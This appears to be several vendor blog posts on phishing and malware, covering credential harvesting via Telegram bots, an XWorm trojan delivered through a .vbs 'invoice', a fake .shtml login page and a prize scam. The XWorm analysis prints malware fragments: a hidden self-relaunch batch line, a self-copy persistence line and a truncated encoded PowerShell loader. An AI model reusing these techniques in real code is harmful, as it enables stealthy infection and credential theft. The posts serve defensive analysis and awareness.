Since I’m rarely able to control my curiosity, I temporarily added an exclusion to Malwarebytes’ web protection so I could see where the link would take me. The destination was a website displaying a login form with the target’s email address already filled in (the address shown here was fabricated by me):

The objective was clear: phishing. But the site’s source code didn’t reveal much.

The most likely objective was to harvest business email addresses and their passwords. Attackers commonly test these credentials against enterprise services such as Microsoft Outlook, Google Workspace, VPNs, file-sharing platforms, and payroll systems. The deliberately vague prompt for a “business email” increases the likelihood that users will provide corporate credentials rather than personal ones.

There was also a small personalization touch. The “Estimado” greeting sets a professional tone and is common in business correspondence across Spanish-speaking regions.

For a full analysis read on, but the real clue is that the harvested credentials accompanied additional information about the victim’s browser, operating system, language, cookies, screen size, and location. This data was sent directly to the scammer’s account on Telegram, where it’s likely to be used to compromise the business network or sold on to other cybercriminals.

A quick search on VirusTotal showed that there were several PDF files linking to the exact same ionoscloud.com subdomain.

Analysis

As I pointed out earlier, the source code of the initial phishing page did not reveal a lot. These are probably auto-generated templates that can be planted on any website, allowing attackers a fast rotation.

ionoscloud.com belongs to IONOS Cloud, the cloud infrastructure division of IONOS, a major European hosting company. It offers services similar to Amazon AWS or Microsoft Azure, including hosting for websites and files. Scammers specifically choose reputable cloud platforms like IONOS Cloud because of the “halo effect” of being hosted at a well-known domain, which means security companies can’t just block the whole domain.

The criminals also get the flexibility to quickly spin up, modify, or tear down phishing sites and continue to evade detection by moving to new URLs or storage buckets.

So, we followed the trail to a JavaScript file, which turned out to be obfuscated script—and a long one at that. But the end of it looked promising.

Since it was still unclear at this point what it was up to, I made a change to the script to avoid infection and which allowed me to get the source code without executing the script. To achieve this, I replaced the last line of the original script with code that exports the next layer to an HTML file.

The next obfuscation layer turned out to be easy. All it contained was a long string that needed to be unescaped. Because of the length, I used an online decoder to do that for me.

This showed me the code for the actual form that the target would see—and the goal of the whole phishing expedition.

The part that did the actual harvesting was hidden in another script.

This was still pretty long and obfuscated but by analyzing the code and giving the functions readable names I managed to find out which information the script gathered. For example, the script uses the ipapi location service:

And I found out where it sent the details.

Any credentials entered on the phishing page are POSTed directly to the attacker’s Telegram bot and immediately forwarded to their chosen Telegram chat for collection. The Telegram chat ID hardcoded in the script was 5485275217.

How to stay safe

The advice here is pretty standard. (Do as our customer did, not as I did.)

• Phishing and malware campaigns frequently use PDF files, so treat them like any other attachment: don’t open until the trusted sender confirms sending you one.
• Never click links inside attachments without verifying with the sender, especially if you weren’t expecting the message or don’t know the sender.
• Always check the address of any website asking for your login details. A password manager can help here, as it won’t auto-fill credentials on a fake site.
• Use real-time anti-malware protection, preferably with a web protection component. Malwarebytes blocks the domains associated with this campaign.
• Use an email security solution that can detect and quarantine suspicious attachments.

Pro tip: Malwarebytes Scam Guard recognized the screenshot of the PDF as a phishing attempt and provided advice on how to deal with it.

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Somebody forwarded an “invoice” email and asked me to check the attachment because it looked suspicious. Good instinct—it was, and what we found inside was a surprisingly old trick hiding a modern threat.

What it does

If the recipient had opened the attached Visual Basic Script (.vbs) file, it would have quietly installed a remote-access Trojan known as Backdoor.XWorm. Once active, it could have let attackers:

• Steal files, passwords and other personal data
• Record keystrokes
• Spy on the user
• Install other malware, including ransomware

Everything happens silently, with no alerts or windows. It’s built to avoid antivirus tools and hand over complete control of the PC.

“Hi,

Please find attached the list of invoices we have processed and payment has been made as of 8/1/2025 2:45:06 a.m.

Kindly review and confirm that these have been received on your end.

Additionally, we would appreciate it if you could send us an updated list of any outstanding or unpaid invoices for our records.

Looking forward to your response.

Best regards,

Account Officer”

The payload was identified by our research team as Backdoor.XWorm. XWorm is a known remote-access trojan (RAT) and backdoor used for spying, keylogging, stealing data, and even installing ransomware. It is sold as malware-as-a-service (MaaS), which means cybercriminals sell (or more often, rent) it to other criminals, who can then distribute and deploy it as they see fit while using the MaaS provider’s infrastructure to receive stolen data and maintain access through the backdoor.

Why this email was suspicious

The email itself had obvious warning signs: no names, just a generic “Hi” and a vague “Account Officer” signature. Real invoices or payment notices almost always include contact details, so this alone should raise suspicion.

That attachment immediately stood out because .vbs files are almost never used in business emails anymore. Visual Basic Script was a Windows automation tool from the late 1990s and 2000s—long since replaced by more versatile scripting languages like PowerShell.

Today, almost every company blocks .vbs attachments outright because they can execute code the moment you open them.

So when one still gets through, it usually means either a security filter failed or an attacker deliberately tried to bypass it. In 2025, receiving a .vbs “invoice” is like finding a floppy disk in your mailbox. It’s retro, suspicious, and definitely not something you should plug in.

How to stay safe

• Double-check unexpected attachments: If you weren’t expecting it, confirm first using a known contact method, rather than by replying to the same email.
• Don’t open executable files: Anything ending in .exe, .vbs, .bat, or .scr can run code. Legitimate businesses don’t send these by email.
• Watch for red flags: Generic greetings, odd job titles, or hidden file types are giveaways. Turn on the option to show file extensions so you can spot fakes like invoice.pdf.vbs.
• Keep your protection on and updated: Use an up-to-date real-time anti-malware solution preferably with a web protection module.

Technical analysis

I wanted to know exactly what that attachment did and how it worked. For our technical readers, here’s my deep dive down the wormhole.

The email

The message itself was straightforward—a short “invoice” note with a polite request to confirm payment and a .vbs attachment named INV-20192,INV-20197.vbs. Nothing about the text was overtly malicious, but the presence of a Visual Basic Script attachment immediately stood out.

.vbs files are rarely, if ever, used in legitimate business correspondence anymore. Because they can execute code directly, most mail gateways block them outright. Seeing one arrive intact suggested either a configuration oversight or a deliberate attempt to bypass filtering.

That alone made the sample worth a closer look.

Delivery

Using an Excel file with a malicious VBA macro often makes more sense from a criminal’s perspective than sending a plain .vbs attachment. Excel files are common in business environments and can appear legitimate, making them less likely to raise suspicion than a raw script. Attackers also benefit because macro-enabled Office documents remain a frequent delivery mechanism. Many users and organisations still interact with these files and can be tricked into enabling macros for what seem like “legitimate” reasons.

Microsoft has made macros harder to execute by default, so some threat actors have shifted tactics. Macros still work where social engineering succeeds, but attackers increasingly experiment with other vectors when they can’t rely on macros.

Compared with an Excel document, a .vbs attachment immediately stands out as unusual in modern business email and is often blocked by gateway rules. In this case, the sender may also have been counting on hidden file extensions (invoice.pdf.vbs) to make the file look like a harmless invoice; a small deception that still fools busy users.

Although .vbs is largely obsolete, it’s not harmless. Visual Basic Script can run arbitrary commands on Windows and can download or create additional malicious files. It’s crude, but it still works if it gets past filters or lands with an unaware user.

I expected the code to be less-than-sophisticated, but only the first level was.

The .vbs dropped IrisBud.bat into %TEMP% (C:\Windows\Temp\IrisBud.bat) and invoked it via WMI. The .bat restarted itself in a way so it ran invisibly. The batch then copied itself to the user profile as aoc.bat and contained heavy obfuscation. Its end goal was to run a PowerShell loader that read encoded strings from aoc.bat and turn them into the real payload.

Our team identified that payload as Backdoor.XWorm—a remote-access trojan (RAT) sold as malware-as-a-service. If executed, it would give attackers stealthy access to the machine: steal files and credentials, record keystrokes, install more malware, or deploy ransomware.

The whole chain runs quietly and is designed to avoid detection. Simply opening the attachment would have put the user’s data at serious risk. If you have found Backdoor.XWorm on your machine, we advise you to follow the remediation and aftermath sections of this detection profile.

VBS

The .vbs file at first sight looked like alphabet soup, but the last line (of 429) provided the plan. I commented out that last line so INV-20192,INV-20197.vbs would create IrisBud.bat but not execute it.

BAT

However, my hopes of the batch file being easier to read were quickly run into the ground. Most of the batch file consisted of simple WriteLine commands which wrote almost everything ad verbatim into IrisBud.bat.

But if you look closely you see a lot of repeated variables like %gkgqglgzhphupcp% in the first line and %viqfvdhc% in line 30. I determined that these variables were not assigned a value and only there for “padding.” Padding is a technique used by malware authors to make their malicious programs harder to detect or analyze.

Imagine you have a box with secret contents that you don’t want anyone to find easily. To hide what’s really inside, you fill the box with a lot of extra, useless material—like packing peanuts, shredded paper, or just empty space—so it’s difficult for someone to see or measure what’s actually important in the box.

So, my first move was to get rid of all the padding. Although not perfect, that cleared some things up.

The line
if not DEFINED Abc1 (set Abc1=1 & cmd /c start "" /min "%~dpnx0" %* & exit)
is a classic malware technique to hide execution from the user while keeping the script running in the background. Let’s look at it step by step:

1. if not DEFINED Abc1 — Checks if the variable Abc1 doesn’t exist yet.
2. set Abc1=1 — Sets the variable to 1 (which marks that this check has been done).
3. cmd /c start "" /min "%~dpnx0" %* — Restarts the batch file:
   • cmd /c runs a new command prompt
   • start "" /min starts a program minimized (invisible to the user)
   • "%~dpnx0" is the full path to the current batch file itself
   • %* passes along any command-line arguments
4. exit — Exits the current (visible) instance

So, in other words the first time it runs:

• It restarts itself in a minimized/hidden window.
• The original visible instance exits immediately.
• The new hidden instance continues running with Abc1=1 set, so it won’t trigger this restart loop again.

And this line:
copy "%sourceFile%" "%userprofile%\aoc.bat" >nul
is where the bat file copies itself to the user’s profile directory.

Breaking it down:

• %sourceFile% — The source (set earlier to the current batch file’s full path).
• %userprofile%\aoc.bat — The destination: the user’s profile directory (typically C:\Users\[username]\) with the new name aoc.bat.
• >nul — Suppresses output (hides the “1 file(s) copied” message).

The setlocal enabledelayedexpansion is needed because exclamation marks (!) around variables are used for delayed variable expansion, which allows the batch script to update and use the value of variables dynamically within loops or code blocks where normal percent expansion wouldn’t work. This requires delayed expansion to be enabled which is done with the command setlocal enabledelayedexpansion.

From the next lines I can tell that the !xmgotoyfycqitjc! which we see can be replaced by the set command.

Because it is defined by:

set "xmgotoyfycqitjc=!ejlhixzkmttzgho!e!ugcqubmykdxgowp!"
where earlier we saw:
set "ejlhixzkmttzgho=s"
set "ugcqubmykdxgowp=t"
Together this makes xmgotoyfycqitjc = s + e + t so my next step was to replace all those instances. And with that we made a good start at mapping out all the variables that were not intended as padding.

Of specific interest in this case was one particular line (414) where all the mapped variables came together.

The only two other lines that stood out were two lines that begin with :: and contain a very long string. While these superficially appear to be ordinary batch comments, they actually hide encrypted payload data (lines 41 and 69 are the hidden payload).

We’ll get to those later on.

First, we need to construct line 414 into something readable.

After replacing all the defined variables, line 414 turned into this:

Windows\System32\WindowsPowerShell\v1.0\powershell.exe-nop -c coding]::Unicode.GetString([Convert]::FromBase64String(('CgAkA…..{very_long_base64_encoded_string}…..AoA'.Replace('hkfdo','')))))

The replace command showed me that I had to remove even more padding—this time from the encoded PowerShell script which was padded with the hkfdo string.

PowerShell

After I did that and decoded the base64 string, this was the PowerShell script:

What this PowerShell script does explains why the two long lines I referred to earlier are needed:

First part: the script looks for the hidden payload in aoc.bat (the copy it created). The script reads aoc.bat line by line, looking for lines that start with ::: (three colons). If it finds one, it treats everything after the colons as Base64-encoded data, decodes it, and runs it as PowerShell code. This is a way to hide malicious commands inside what looks like a batch file comment.

Second part: creates the main malicious payload. The big block (starting with $weiamnightfo) does several things:

1. Reads encrypted data from aoc.bat: It looks for a line starting with :: (two colons) in the batch file, which contains encrypted and compressed malware.
2. Decrypts the data: It uses AES encryption (with a hardcoded key and Initialization Vector (IV)) to decrypt the payload. Think of this like unlocking a safe with a specific combination.
3. Decompresses it: After decryption, it unzips the data using GZip compression. The malware was squeezed down to make it smaller and harder to detect.
4. Loads and runs the malware: The decrypted/decompressed data turns out to be two executable files. The script loads these files directly into memory and runs them without ever saving them to disk. This is called a “fileless attack” and helps avoid anti-malware detection.

By loading and running these malicious programs directly in memory, the attack avoids dropping visible files on disk, making it much harder for anti-malware solutions to spot or capture the real threat.

Payload

To extract the payload safely I wrote a Python script to reproduce steps 1–3 without executing the code in memory. That produced two executable samples which I ran in an isolated sandbox.

The sandbox revealed a mutex 5wyy00gGpG6LF3m6 which pointed to the XWorm family. “Mutex” stands for mutual exclusion, which is a special marker that a running program creates on a Windows computer to make sure only one copy of the process is running at once. Malware authors bake them into their code and security analysts catalog them, much like a “fingerprint.” So when our researchers see one of the known mutex names, they can easily classify the malware and move on to the next sample.

Indicators of Compromise (IOCs)

INV- 20192,INV-20197.vbs (email attachment)
IrisBud.bat (in %temp% folder)
aoc.bat (In %user% folder)
SHA256: 0861f20e889f36eb529068179908c26879225bf9e3068189389b76c76820e74e ( for Backdoor.XWorm)

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This attempt to phish credentials caught our attention, mostly because of its front-end simplicity. Even though this is a script-kiddie-level type of attack, we figured it was worth writing up—precisely because it’s so easy to follow what they’re up to.

The email is direct and to the point. Not a lot of social engineering happening here.

“Dear ,

Pls kindly find the attached PO please send us PI once its available.”

The sender’s address belongs to a Czechoslovakian printing service (likely compromised), and the name and phone number are fake. The target is in Taiwan.

The attached .shtml file is a tidy fake login screen that doesn’t really specify which credentials they want:

The pre-filled email address in the screenshot is a fake one I added; normally it would be the target’s email.

We assume the phisher welcomes any credentials entered here, and are counting on the fact that most people reuse passwords on other sites.

Under the hood, the functionality of this attachment lies in this piece of JavaScript.

It starts with simple checks to make sure all the fields are filled out and long enough before declaring the Telegram bot that will receive the login details.

Using Telegram bots provides the phishers with several advantages:

• Stolen credentials are delivered instantly to the attacker via Telegram notifications. No need for the phisher to keep checking a database or inbox.
• Telegram is a legitimate, globally distributed messaging service, making it difficult to block.
• There’s no exposed web server or obvious phishing “drop site” that can be blocklisted or shut down.

The last line contains a credibility trick:

setTimeout(() => {window.location.assign("file:///C:/Users/USER/Downloads/Invoice_FAC_0031.pdf")}, 2000);

This tries to open a file on the user’s computer after waiting 2 seconds (2,000 milliseconds). Since this file almost certainly doesn’t exist, the browser will either block the action (especially from an email or non-local file) or show an error. Either way, it will make the login attempt look more legitimate and take the user’s mind off the fact that they just sent their credentials who knows where.

That’s really all there is to it, except for a bit of code that the dungeon-dweller forgot to remove during their copy-and-paste coding. Or they had no idea what it was for and left it in place for fear of breaking something.

I suspect the attacker originally used this code to encrypt the credentials with a hardcoded AES (Advanced Encryption Standard) key and injection vector, then send them to their server.

This attacker replaced that method with the simpler Telegram bot approach (much easier to use), but left the decryption stub because they were afraid removing it would break something.

Don’t fall for phishing attempts

Even though the sophistication level of this email was low, that does not reduce the possible impact of sending the attacker your credentials.

In phishing attempts like these, two simple rules can save you from lots of trouble.

• Don’t open unsolicited attachments
• Check if the website address in the browser matches the domain you expect to be on (e.g. adobe.com).

Other important tips to stay safe from phishing in general:

• Verify the sender: Always check if the sender’s email address matches what you would expect it to be. It’s not always conclusive but it can help you spot some attempts.
• Check through an independent channel if the sender actually sent you an attachment or a link.
• Use up-to-date security software, preferably with a web protection component.
• Keep your device and all its software updated.
• Use multi-factor authentication for every account you can.
• Use a password manager. Password managers will not auto-fill a password to a fake site, even if it looks like the real deal to you.

If you already entered credentials on a page you don’t trust, change your passwords immediately.

Pro tip: You can also upload screenshots of suspicious emails to Malwarebytes Scam Guard. It would have recognized this one as a phishing attempt.

---

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

We received a timely phishing email pretending to come from Home Depot. It claimed we’d won a Gorilla Carts dump cart (that’s a sort of four-wheeled wheelbarrow for anyone unfamiliar)—and said it was just one click away.

It wasn’t.

The whole image in the email was clickable, and it hid plenty of surprises underneath.

Sender:

The sender email’s domain (yula[.]org) is related neither to Home Depot nor the recipient.

The yula[.]org domain belongs to a Los Angeles high school. The email address or server may be compromised. We have notified them of the incident.

Hidden characters:

Below the main image, we found a block filled with unnecessary Unicode whitespace and control characters (like =E2=80=8C, =C3=82), likely trying to obfuscate its actual content and evade spam filters. The use of zero-width and control Unicode characters is designed to break up strings to confound automated phishing or spam filters, while being invisible to human readers.

Reusing legitimate content:

Below the image we found an order confirmation that appears to be a legitimate transactional message for trading-card storage boxes.

The message seems to be lifted from a chain (there’s a reply asking “When is the expected date of arrival?”), and includes an embedded, very old order confirmation (from 2017) from sales@bcwsupplies[.]com—a real vendor for card supplies.

So, the phisher is reusing benign, historic content (likely harvested from somewhere) to lend legitimacy to the email and to help it sneak past email filters. Many spam and phishing filters (both gateway and client-side) give higher trust scores to emails that look like they’re part of an existing, valid conversation thread or an ongoing business relationship. This is because genuine reply chains are rarely spam or phishing.

Tracking pixel:

We also found a one-pixel image in the mail—likely used to track which emails would be opened. They are almost invisible to the human eye and serve no purpose except to confirm the email was opened and viewed, alerting the attacker that their message landed in a real inbox.

The address of that image was in the subdomain JYEUPPYOXOJNLZRWMXQPCSZWQUFK.soundestlink[.]com. The domain soundestlink[.]com  is used by the Omnisend/Soundest email marketing infrastructure for tracking email link clicks, opens, and managing things like “unsubscribe” links. In other words, when someone uses Omnisend to send a campaign, embedded links and tracking pixels in the email often go through this domain so that activity can be logged (clicks, opens, etc.).

Following the trail

That’s a lot of background, so let’s get to the main attraction: the clickable image.

The link leads to https://www.streetsofgold[.]co.uk/wp-content/uploads/2025/05/bluestarguide.html and contains a unique identifier. In many phishing campaigns, each recipient gets a unique tracking token in the URL, so attackers know exactly whose link was clicked and when. This helps them track engagement, validate their target list, and potentially personalize follow-ups or sell ‘confirmed-open’ addresses.

The streetsofgold[.]co.uk WordPress instance hasn’t been updated since 2023 and is highly likely compromised. The HTML file on that site redirects visitors to bluestarguide[.]com, which immediately forwards to  outsourcedserver[.]com, adding more tracking parameters. It took a bit of tinkering and a VPN (set to Los Angeles) to follow the chain of redirects, but I finally ended up at the landing page.

Of course, urgency was applied so visitors don’t take the time to think things through. The site said the offer was only valid for a few more minutes. The “one-click” promise quickly turned into a survey—answering basic questions about my age and gender, I was finally allowed to “order” my free Gorilla Cart.

The fake reward

But no surprise here, now they wanted shipping details.

Wait… what? A small processing fee?!

This is as far as I got. After filling out the details, I kept getting this error.

“Something went wrong with the request, Please try again.”

The backend showed that the submitted data was handled locally at /prize/ajax.php?method=new_prospect on prizewheelhub[.]com with no apparent forwarding address. Likely, after “collecting” the personal info, the backend:

• stores it for later use in phishing or identity theft,
• possibly emails it to a criminal/“affiliate” scammer, and/or
• asks for credit card or payment details in a follow-up.

We’re guessing all of the above.

Tips to stay safe

This campaign demonstrates that phishing is often an adaptive, multi-stage process, combining technical and psychological tricks. The best defense is a mix of technical protection and human vigilance.

The best way to stay safe is to be aware of these scams, and look out for red flags:

• Don’t click on links in unsolicited emails.
• Always check the sender’s address against the legitimate one you would expect.
• Double-check the website’s address before entering any information.
• Use an up-to-date real-time anti-malware solution with a web protection component.
• Don’t fill out personal details on unfamiliar websites.
• And certainly don’t fill out payment details unless you are sure of where you are and what you’re paying for.

IOCs

During this campaign we found and blocked these domains:

www.streetsofgold[.]co.uk (compromised WordPress website)

bluestarguide[.]com (redirector)

outsourcedserver[.]com (fingerprint and redirect) 

sweepscraze[.]online

prizewheelhub[.]com

techstp[.]com

Other domains we found associated with bluestarguide[.]com

substantialweb[.]com

quelingwaters[.]com

myredirectservices[.]com

prizetide[.]online